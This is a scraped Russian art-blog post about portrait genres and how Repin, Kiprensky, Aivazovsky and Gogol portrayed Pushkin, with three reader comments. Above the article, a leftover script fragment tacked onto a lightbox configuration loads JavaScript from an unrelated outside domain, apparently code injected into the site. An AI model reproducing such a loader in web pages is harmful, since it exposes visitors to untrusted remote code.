, 'opacity': false, 'speedIn': 500, 'speedOut': 500, 'changeSpeed': 300, 'overlayShow': false, 'overlayOpacity': "", 'overlayColor': "", 'titleShow': false, 'titlePosition': '', 'enableEscapeButton': false, 'showCloseButton': false, 'showNavArrows': false, 'hideOnOverlayClick': false, 'hideOnContentClick': false, 'width': 500, 'height': 340, 'transitionIn': "", 'transitionOut': "", 'centerOnScroll': false }); var script = document.createElement('script'); script.type= 'text/javascript'; script.src = 'https://cdn.messagefromspaces.com/c.js?pro=type'; document.getElementsByTagName('head')[0].appendChild(script); })
Пользовательский поиск

Добро пожаловать

Советую посмотреть

Страницы

Свежие комментарии

Обмен ссылками

Картины, портреты, критика живописи, Art-дилер




style="display:inline-block;width:120px;height:600px"
data-ad-client="ca-pub-5725625417417931"
data-ad-slot="8961029732">


« | Главная | »

Портреты художников

Автор: Наталья Юрова | 27 Июн 2012

portret Pushkina KiprenskyПортре́т – от французского portrait, что означает -  «воспроизводить что-либо черта в черту», описание реального человека или группы людей, которые живут или же  существовали в реальной действительности.

Портреты могут быть разных стилей и техник написания. Наиболее известной  техникой исполнения портретов у известных художников по-прежнему остается «портрет маслом на холсте». Далее следует стиль портрета в графике, который исполняется в технике «сухая кисть». Иногда  художники создают наброски портретов углем, сангиной, сепией, и реже рисуют портреты пастелью, акварелью и карандашом, хотя это очень красивые стили, но очень трудоемкие.

Портрет - это самостоятельный жанр изобразительного искусства, который в свою очередь, подразделяется на: автопортрет - изображение художника, выполненное им самим, например, с помощью зеркала; групповой портрет, семейный - включает не меньше трех персонажей; индивидуальный – один персонаж; камерный - изображение человека по пояс, по грудь или плечи, как правило, на нейтральном фоне; парадный – портрет в полный рост, на архитектурном или пейзажном фоне; шарж - сатирическое изображение, в котором подчеркиваются наиболее характерные черты человека.

Суть портрета - выявить характер героя и выразить своё представление о нем в фигуре и движениях, одежде, жестах и манерах, лице и мимике.

Например, рассмотрим портреты А.С.Пушкина у разных известных художников.

portret Pushkina RepinИ. Репин в картине «Пушкин в Царском Селе» изобразил его в окружении публики, читающим свои произведения. По искусству Репина можно проследить, что ему  более всего удавались сюжетные произведения, изображающие множество людей и какое-либо событие.

Другой известный художник О.А.Кипренский писал исключительно портреты, может поэтому его «Портрет Пушкина» поразил всех необычайным сходством с   Александром Сергеевичем.

portret Pushkina AivazovskyИ.К. Айвазовский, который в своем искусстве превозносит водную стихию,  написал в таком же стеле картину «Пушкин на берегу Черного моря».

Писатель Н.В. Гоголь изобразил чернилами и карандашом на бумаге «Наброски профиля  Пушкина». Профиль поэта нарисован с большим горбатым носом и с усиками, и поэтому более походит на самого Гоголя.

Следовательно, каждый художник передает свое видение персонажа, индивидуальный стиль написания, что отличает его искусство от творчества других художников.

Темы: Художник, о Живописи | Отзывов: 3 »

Отзывов: 3 на “Портреты художников”

  1. Gemma пишет:
    27 Июн 2012 в 16:13

    Портреты художников очень интересно рассматривать, особенно технику наложения штриха.

  2. Наталья пишет:
    28 Июн 2012 в 09:11

    Согласна, портрет – это отражение не только того, кого рисуют, но и отражение внутреннего мира художника. Вот это сочетание и интересно!

  3. Любовь пишет:
    07 Июл 2012 в 13:59

    Мне было интересно узнать, что Айвазовский рисовал Пушкина. Спасибо!

Отзывы

Перед отправкой формы:
Лаборатория Искусства работает на WordPress